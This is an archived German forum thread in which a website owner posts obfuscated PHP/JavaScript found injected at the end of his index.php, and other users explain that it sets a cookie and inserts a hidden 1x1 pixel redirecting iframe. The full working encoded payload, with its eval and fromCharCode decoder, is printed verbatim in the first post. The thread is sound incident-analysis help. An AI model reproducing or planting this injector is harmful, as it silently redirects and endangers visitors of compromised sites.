Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)
-   -   [WEB] Code-Einschleusung (https://www.trojaner-board.de/140137-web-code-einschleusung.html)

infiniteloop 20.08.2013 10:16
[WEB] Code-Einschleusung
 
Hallo zusammen!

Ich weiß nicht ob sich hier jemand mit dem Thema auskennt. Vor kurzem wurde auf einer meiner Webseiten folgendes eingeschleust:
Code:
#0f2490#
if(empty($tqz)) {$tqz = "<script type=\"text/javascript\" language=\"javascript\" >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_75_86_7f_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_75_86_7f_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_75_86_7f_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_51_58_60_66_60_61_52_5a_3b_72_80_3c_76_7a_6e_74_72_7b_72_80_3c_55_4f_66_45_58_7e_40_81_3b_7d_75_7d_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_75_86_7f_69_34_2d_70_79_6e_80_80_4a_69_34_75_86_7f_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_75_86_7f_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_75_86_7f_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>";echo $tqz;}
#/0f2490#
Die Einschleusung habe ich in der "index.php" gefunden, ganz unten nach dem letzten "</html>"-Tag. Die Webseite habe ich ohne CMS entwickelt und ist ganz einfach gebaut. (Keine Formulare / user-inputs.. nur Text und Bilder auf mehrere Seiten. PHP wird nur verwendet um die Inhalte von dem Layout getrennt zu halten)

Mich würde interessieren ob jemand diesen Code schon mal gesehen hat, und weiß was es bewirkt? Ich kenne mich zwar mit JS aus, aber das hier ist mir definitiv zu kryptisch..

Übrigens: wenn man z.Bsp. nach "if(empty($tqz))" googelt, findet man jede menge Seiten die auch mit einem ähnlichen Code befallen sind.

Viele Grüße,
IL

mort 20.08.2013 11:21
Dieser Code ist Obfuscated. Dies bedeutet, dass man im Anfangs-Zustand nicht wirklich sieht, was der Code wirklich tut. Um ihn wieder verständlich zu machen muss man ihn Deobfuscaten.

Nach dem ich den Code Deobfuscated habe, sehe ich was er wirklich macht. Der Code schaut nach einem Cookie. Falls dieser Cookie nicht gesetzt ist, setzt der Code diesen 1 Tag haltbaren Cookie und fügt einen 1x1 px großen iframe auf der Seite ein.

infiniteloop 20.08.2013 11:48
Hi mort,

Vielen Dank für die schnelle Antwort!

Konntest du auch die URL des iframes rauskriegen?

Ich habe zum Thema "deobfuscating / JS" etwas gegoogelt, und auch einige online-Deobfuscatoren gefunden - jedoch konnte ich damit den Code nicht wirklich lesbar machen. Was hast du verwendet?

Danke & Grüße,
IL

mort 20.08.2013 13:48
Zitat:
Konntest du auch die URL des iframes rauskriegen?
Ich kann dir leider aus Sicherheitsgründen keinen Link zur Seite geben. Aber in meinem Fall will die Seite mich auf eine andere weiterleiten.
Hier habe ich eine Web of Trust Bewertung der Seite auf die ich weitergeleitet werden soll.
-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)


Zitat:
Was hast du verwendet?
Ich mach das per Hand. Der eigentliche Code ist "verschlüsselt" in einer Variable. Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".

infiniteloop 20.08.2013 22:13
Zitat:
Zitat von mort (Beitrag 1136366)
-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)
da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.


Zitat:
Zitat von mort (Beitrag 1136366)
(..) Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".
Ich glaube ich komme auch langsam dahinter. Der Code beginnt mit dem Algorithmus der die Zeichenkette "z" entschlüsselt. Dann ist es auch klar, dass es per Online-Generator nicht geht.. :wtf:


Vielen Dank für deine Hilfe und für die Tipps!

aharonov 20.08.2013 23:18
Zitat:
da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.
Das ist sie auch. Sie haben diese redirects auf ihre Website bei malekal auch bemerkt: [en] Reveton go now by hacked website | malekal's site
Und vermuten:
Someone is probably trying to get the site blacklisted or to get bad reputation.


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:55 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27